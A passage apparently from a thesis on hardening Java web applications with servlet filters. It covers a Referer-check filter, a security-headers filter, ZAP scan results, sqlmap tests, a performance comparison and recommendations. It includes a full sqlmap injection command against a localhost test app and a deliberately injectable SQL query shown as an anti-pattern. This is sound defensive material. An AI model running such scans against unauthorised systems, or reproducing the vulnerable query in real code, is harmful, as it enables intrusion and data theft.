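        if (raw == null || raw.trim().isEmpty()) {
            throw new ServletException("validPatterns init parameter is required");
        }
        for (String p : raw.split(",")) {
            validPatterns.add(p.trim());
        }
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        // Assumption: only state-changing (non-GET) requests are checked, so plain
        // navigation from bookmarks or external links keeps working.
        if (!"GET".equalsIgnoreCase(request.getMethod())) {
            String referer = request.getHeader("Referer");
            if (referer == null || validPatterns.stream().noneMatch(referer::startsWith)) {
                response.sendError(HttpServletResponse.SC_FORBIDDEN, "Bad or missing Referer");
                return; // the request never reaches the servlet
            }
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }
}
```

A Referer prefix check is only a supplementary control: browsers and proxies may strip the header, so it complements rather than replaces anti-CSRF tokens.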

Passive scanning with ZAP identified the following vulnerabilities:



Alerts (7):
• HTTP Only Site
• Password Autocomplete in Browser
• Server Leaks Version Information via "Server" HTTP Response Header Field
• Absence of Anti-CSRF Tokens (2)
• Non-Storable Content (8)
• Storable and Cacheable Content (3)
• User Agent Fuzzer (7)

Figure 2.2.4-1 Results of the passive scan

Medium risk level:

HTTP Only Site

Low risk level:

Password Autocomplete in Browser
Server Leaks Version Information via "Server" HTTP Response Header Field
Absence of anti-CSRF tokens.

Active scanning with ZAP identified the following vulnerabilities:



Alerts (7):
• HTTP Only Site
• Password Autocomplete in Browser
• Server Leaks Version Information via "Server" HTTP Response Header Field (17)
• Absence of Anti-CSRF Tokens (9)
• Non-Storable Content (10)
• Storable and Cacheable Content (9)
• User Agent Fuzzer (196)

Figure 2.2.4-2 Results of the active scan

Active scanning did not identify any new vulnerabilities beyond those found in passive mode. A repeated active scan with an increased attack strength was performed, and it also revealed no vulnerabilities. The risks of SQL and XSS attacks have been eliminated. The risks associated with security headers missing from the HTTP responses have also been eliminated.
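As an added illustration (not the thesis author's filter), a servlet filter that sets the browser-protection headers whose absence ZAP reported in the scans above. The class name and the header values are assumed defaults; the CSP policy in particular must match the resources the application actually loads.

```java
import com.google.inject.Singleton;
import javax.servlet.*;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

// Register in configureServlets() with: filter("/*").through(SecurityHeadersFilter.class);
@Singleton
public class SecurityHeadersFilter implements Filter {
    @Override
    public void init(FilterConfig config) { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletResponse response = (HttpServletResponse) res;
        // Headers must be set before the servlet commits the response, hence before chain.doFilter.
        // "X-Frame-Options Header Not Set": forbid framing, the clickjacking defence.
        response.setHeader("X-Frame-Options", "DENY");
        // "Content Security Policy (CSP) Header Not Set": same-origin resources only
        // (assumed policy; widen it if the application loads external scripts or styles).
        response.setHeader("Content-Security-Policy",
                "default-src 'self'; object-src 'none'; frame-ancestors 'none'");
        // "X-Content-Type-Options Header Missing": stop the browser from sniffing MIME types.
        response.setHeader("X-Content-Type-Options", "nosniff");
        // "Web Browser XSS Protection Not Enabled": the legacy flag ZAP checks for.
        response.setHeader("X-XSS-Protection", "1; mode=block");
        // "Storable and Cacheable Content": keep authenticated pages out of caches,
        // which also prevents pages from being served from cache after logout.
        response.setHeader("Cache-Control", "no-store");
        response.setHeader("Pragma", "no-cache");
        // "Server Leaks Version Information": replace whatever the container would send.
        response.setHeader("Server", "webapp");
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }
}
```

Some containers add their own Server header after the filter has run, so verify the effective headers with a ZAP rescan and, if needed, configure the header in the container as well.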
Ordinary sqlmap testing showed the expected results: the target DBMS could not be identified, and the parameters are not vulnerable to SQL attacks. The testing level was then raised to the maximum (besides the request parameters, the headers are also checked), and the target DBMS was specified explicitly as a parameter:

python sqlmap.py -u http://localhost:8080/testsec/login --data="login=sqlmap&password=sqlmap" --level=5 --dbms=PostgreSQL
All kinds of injection were tried on the login parameter and on the Referer, Host and User-Agent headers, but no vulnerabilities were found. The testing risk level was also raised (risk=3), but this did not help to find any vulnerable parameters.

2.2.5. Performance

When planning the security of a web application, performance must be kept in mind.

It should be understood that the requests that need reinforced protection are those that change account data or carry out transactions. At the same time, such protection should not be applied to absolutely every page and action in the web application, for example, switching the language or moving to the mobile version. Processing requests and responses, generating and verifying tokens, encryption/decryption: all of this takes time. We are all able to wait while data is processed during a payment or a change of credentials, but if this happened on every request, using such a web application would be extremely uncomfortable, and users would most likely switch to an alternative with a faster response.

Let us compare the performance of the test application. The total time in the tables is the time from sending the request to receiving the response.
Table 1 Performance without the filters

URL       Request processing, ms   Total time, ms
/login    13                       307
/login     9                       210
/login     9                       300
/login     9                       218
/login     9                       199
Average    9.8                     246.8


Table 2 Performance with the filters

URL       Filter work, ms   Request processing, ms   Total time, ms
/login    11                19                       231
/login     5                18                       314
/login     9                18                       226
/login     5                14                       218
/login     7                15                       301
Average    7.4              16.8                     258
Analysis of the results

The scans of the test application with the filters enabled, carried out with ZAP, revealed no serious vulnerabilities such as the possibility of SQL or XSS attacks, unlike the application without the filters. The sqlmap utility likewise found no HTTP request parameters or headers vulnerable to SQL injection. This indicates that the developed filters can be used to protect web applications written in Java. At the same time, it should not be forgotten that the developed tools provide only basic protection. When working with confidential data and finances, attention should also be given to authentication/authorization mechanisms, access control, encryption, and authentication tokens for preventing CSRF attacks.

Let us consider the performance of the web application. According to the test results, on average the filters take 45% of the request processing time and 2.9% of the total time. Compared with the application without filters, request processing time increased by 71.4% and the total time by 4.5%. Although request processing now takes significantly longer, overall the difference in total response time with and without the filters is not noticeable to a person.

General recommendations for securing web applications

1) When interacting with the database, use prepared statements wherever variables are used, if at all possible.

2) Do not use constructions like the following:

final Statement select = connection.createStatement();
final String query =
    "SELECT * " +
    "FROM testdb.user " +
    "WHERE id = '" + id + "'";  // vulnerable: id is concatenated straight into the query

Here id is an input parameter that is simply passed into the SQL query.

Instead, use the following code:

final PreparedStatement select = connection.prepareStatement(
    "SELECT * " +
    "FROM testdb.user " +
    "WHERE id = ?"
);
select.setString(1, id);  // the value is bound as data, never parsed as SQL

3) Check the types of the data coming from the client and validate the input against regular expressions.

4) Filter and/or escape all input data from the client side, whether it is a request parameter from an input field or a header value. This helps defend against attacks such as SQL injection and XSS.

5) To output variables safely on a page when using JSP, wrap them in <c:out value="${user.name}"/> for displaying information or in <input type="text" name="foo" value="${fn:escapeXml(param.foo)}" /> for input fields.

6) Use special HTTP headers to enable additional browser protection. This makes exploitation of any existing vulnerabilities considerably harder.

7) Use ready-made authentication mechanisms with token support to protect against CSRF attacks. Checking the referer header can also be used as an additional control.

8) Use access control mechanisms for the requested resources.

9) Make sure that logging out of the account is handled correctly: terminate (invalidate) the session and forbid the browser from caching pages.

10) Use strong algorithms for encrypting data, especially passwords.

11) Do not use tools with known vulnerabilities.

12) Change the default accounts in the components you use, for example, in the DBMS.

13) Do not store critical data unless necessary, and remove unused code.

14) Use whitelists of permitted addresses when handling redirects.

15) Regularly update the components and software you use, and carry out security testing and code review.

Conclusion

In the course of this work, the most common vulnerabilities from the OWASP Top 10 were examined, together with the ways of detecting and eliminating them and the tools intended for this. Servlet filters for securing a Java web application were developed.

Testing was carried out with the Zed Attack Proxy and sqlmap tools. Scanning the vulnerable test application revealed the following serious vulnerabilities: the possibility of SQL and XSS attacks, and the absence of the special headers that enable browser protection. Scanning the test application that uses the developed filters did not reveal these vulnerabilities.

A list of general recommendations for securing web applications was also compiled.